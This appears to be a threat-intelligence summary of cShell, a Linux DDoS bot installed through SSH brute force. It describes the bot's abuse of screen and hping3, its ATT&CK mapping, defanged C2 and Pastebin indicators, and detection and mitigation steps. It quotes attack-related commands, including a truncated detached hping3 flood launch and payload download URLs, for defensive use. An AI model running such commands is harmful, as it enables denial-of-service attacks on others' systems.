Full Report
AhnLab SEcurity intelligence Center (ASEC) monitors attacks against poorly managed Linux servers using multiple honeypots. Among the prominent honeypots are SSH services using weak credential information, which are targeted by numerous DDoS and CoinMiner threat actors. ASEC recently identified a new DDoS malware strain targeting Linux servers while monitoring numerous external attacks. The threat […]
Analysis Summary
# Tool/Technique: cShell DDoS Bot
## Overview
cShell is a newly identified DDoS malware strain targeting poorly managed Linux servers, often installed after attackers gain initial access through compromised SSH services. Its primary purpose is to turn the compromised Linux server into a DDoS bot capable of executing various denial-of-service attacks directed by a Command and Control (C2) server. A distinct characteristic is its reliance on legitimate Linux utilities, specifically `screen` and `hping3`, to execute the attacks.
## Technical Details
- Type: Malware (DDoS Bot)
- Platform: Linux
- Capabilities: Brute force initial access (via SSH), downloading secondary components (`cARM`), persistence via `systemd` service, leveraging `screen` and `hping3` for launching various DDoS attacks (SYN, ACK, UDP floods, etc.), C2 communication, and self-update functionality using Pastebin URLs.
- First Seen: Recent detection noted in late 2024 (based on detection date mentions).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1110 - Brute Force
- T1110.001 - Password Guessing: Login for SSH services.
- **TA0003 - Persistence**
- T1543.002 - Create or Modify System Process: Systemd Service
- Registration via `systemctl` using `sshell.service`.
- **TA0009 - Collection**
- T1005 - Data from Local System
- The malware installs secondary components like `cARM`.
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols
- Communication with C2 over HTTP/S to receive commands.
- **TA0018 - Defense Evasion**
- T1218 - Signed Binary Proxy Execution
- Exploitation of legitimate, installed binaries (`screen`, `hping3`).
## Functionality
### Core Capabilities
- **Initial Compromise:** Scans exposed SSH services and uses brute force to gain access.
- **Installation:** Downloads and installs `curl`, the primary malware strain (`cARM`), and necessary exploitation tools (`screen`, `hping3`). Installation routines include German error messages depending on the Linux version (using `apt`, `yum`, etc.).
- **Persistence:** Establishes persistence by creating and registering `/etc/de/cARM` and a corresponding `sshell.service` file for management via `systemctl`.
- **DDoS Execution:** Executes DDoS attacks by running `hping3` within a detached `screen` session, named "concurrent".
### Advanced Features
- **Utility Abuse:** The core method involves abusing legitimate Linux tools:
- **`screen`:** Used to run `hping3` in the background (`-dms`) so the attack continues after the initial session closes.
- **`hping3`:** Used to generate and transmit various malicious packets (TCP SYN, ACK, UDP) at maximum speed (`--flood`).
- **Dynamic Updates:** Supports an `UPDATE` command from C2. It checks up to four hardcoded Pastebin links to download the latest version of cShell using `curl`.
- **C2 Interaction:** Listens for commands from the C2, responding with "1" in an idle state. DDoS commands are received and parsed as 5 space-separated strings (command, target IP, target port, screen timeout, data size).
## Indicators of Compromise
- File Hashes:
- MD5: `29d6ef7365c18d243163a648fa6cd697`, `cd8bf4ce178ef5ddac77933d03ffb381`
- File Names:
- `/etc/de/cARM` (Malware payload installation path)
- `sshell.service` (Persistence service file)
- Registry Keys: Not applicable (Linux system service file used)
- Network Indicators:
- URL/IP C2: `http[:]//51[.]81[.]121[.]129/cARM`, `http[:]//51[.]81[.]121[.]129/sshell[.]service`
- IP Addresses: `195[.]178[.]110[.]6`, `45[.]148[.]10[.]176`, `45[.]148[.]10[.]203`, `45[.]148[.]10[.]46`, `51[.]81[.]121[.]129`
- Update URLs (Pastebin): `https[:]//pastebin[.]com/raw/2AhnDGts`, `https[:]//pastebin[.]com/raw/7beUg9vK`, `https[:]//pastebin[.]com/raw/8kGSNMFr`
- Behavioral Indicators:
- Execution of `apt -y install curl && apt -y install hping3 && apt -y install screen`.
- Use of `screen -dms concurrent hping3...` to launch attacks persistently.
- Use of `systemctl enable sshell.service`.
## Associated Threat Actors
- Threat actors targeting poorly managed Linux SSH servers for DDoS botnet recruitment (described as "DDoS and CoinMiner threat actors" generally, but specific group not named for cShell). The source code suggests an early version ("Test").
## Detection Methods
- Signature-based detection: Detection names include `Trojan/Linux.Cshell.7736270` and `Trojan/Script.Agent`.
- Behavioral detection: Monitoring for the simultaneous installation of `hping3` and `screen` alongside attempts to create persistent services (`systemd`). Monitoring for the execution of `hping3` commands with flood options under a detached `screen` session.
- YARA rules: Not explicitly provided, but rules could target the Go source code remnants or specific strings/patterns related to the service file structure.
## Mitigation Strategies
- **Prevention:** Implement strong, unique passwords for all SSH accounts and enforce multi-factor authentication if possible. Disable root login over SSH.
- **Hardening:** Limit network access to SSH ports (22) using firewalls, restricting access only to trusted IPs where necessary. Ensure timely patching of the Linux OS to prevent vulnerability exploitation upstream of brute-forcing.
- **System Integrity:** Regularly audit `systemd` service files and running processes for unexpected background tasks, especially those involving legitimate tools like `hping3` or `screen` being run maliciously. Regularly check for unknown files in sensitive directories like `/etc/`.
## Related Tools/Techniques
- **cARM:** A related malware strain installed in the initial access sequence.
- **CoinMiner:** Mentioned generally as another type of threat actor targeting these same servers.
- **hping3:** A legitimate tool being abused (TA0018 execution).
- **screen:** A legitimate utility being abused (TA0018 execution).